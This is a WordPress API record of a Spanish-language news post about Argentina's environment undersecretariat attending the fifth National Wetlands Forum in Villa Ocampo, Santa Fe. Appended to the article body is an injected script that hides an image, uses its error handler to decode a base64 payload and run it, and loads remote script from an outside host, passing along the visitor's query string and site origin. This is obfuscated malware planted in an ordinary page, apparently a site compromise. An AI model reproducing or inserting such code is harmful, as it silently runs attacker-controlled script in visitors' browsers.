{"id":9617,"date":"2025-06-03T12:01:14","date_gmt":"2025-06-03T15:01:14","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9617"},"modified":"2025-08-13T15:27:42","modified_gmt":"2025-08-13T18:27:42","slug":"la-subsecretaria-de-ambiente-de-la-nacion-presente-en-el-v-foro-nacional-de-humedales","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9617","title":{"rendered":"La Subsecretar\u00eda de Ambiente de la Naci\u00f3n presente en el V Foro Nacional de Humedales"},"content":{"rendered":"\n<p><strong><em>La quinta edici\u00f3n del Foro se desarrolla en Villa Ocampo, provincia de Santa Fe.<\/em><\/strong><\/p>\n\n\n\n<p>La Subsecretar\u00eda de Ambiente de la Naci\u00f3n, liderada por Fernando Brom, participa del V Foro Nacional de Humedales, que se llev\u00f3 adelante en Villa Ocampo y es organizado por la provincia de Santa Fe.<\/p>\n\n\n\n<p>Durante las jornadas, se gener\u00f3 el intercambio de experiencias de pol\u00edticas p\u00fablicas orientadas a la preservaci\u00f3n y uso sustentable de estos ecosistemas. En este espacio, la Direcci\u00f3n Nacional de Recursos Naturales de la Subsecretar\u00eda de Ambiente de la Naci\u00f3n realiz\u00f3 dos presentaciones: el marco t\u00e9cnico e institucional para el desarrollo del Inventario Nacional de Humedales, y la Red de sitios Ramsar de Argentina. All\u00ed se reunieron referentes t\u00e9cnicos, cient\u00edficos, organismos no gubernamentales, de la sociedad civil y funcionarios de diversas provincias.<\/p>\n\n\n\n<p>Asimismo, y como parte de este trabajo rec\u00edproco se compartieron herramientas, diagn\u00f3sticos y casos de gesti\u00f3n que permitir\u00e1n mejorar la gobernanza de los humedales, con foco en la planificaci\u00f3n, el inventario, la conservaci\u00f3n y el desarrollo productivo sustentable.<\/p>\n\n\n\n<p>Por la Subsecretar\u00eda de Ambiente de la Naci\u00f3n participaron V\u00edctor Rosales y Laura Benzaqu\u00e9n; por la provincia de Santa Fe participaron el ministro de Ambiente y Cambio Clim\u00e1tico, Enrique Est\u00e9vez; el subsecretario de Medioambiente Alejandro Luciani, el intendente de Villa Ocampo, Cristian Marenga y el presidente del Consejo Federal de Medio Ambiente (COFEMA) y secretario de Estado de Ambiente y Desarrollo Sustentable de la provincia de San Luis, Federico Cacace.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:261px;height:auto\" \/><\/figure>\n\n\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La quinta edici\u00f3n del Foro se desarrolla en Villa Ocampo, provincia de Santa Fe. La Subsecretar\u00eda de Ambiente de la Naci\u00f3n, liderada por Fernando Brom, participa del V Foro Nacional de Humedales, que se llev\u00f3 adelante en Villa Ocampo y es organizado por la provincia de Santa Fe. Durante las jornadas, se gener\u00f3 el intercambio [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9618,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20,28],"tags":[],"class_list":["post-9617","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-pampeana","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9617"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9617\/revisions"}],"predecessor-version":[{"id":9913,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9617\/revisions\/9913"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9618"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}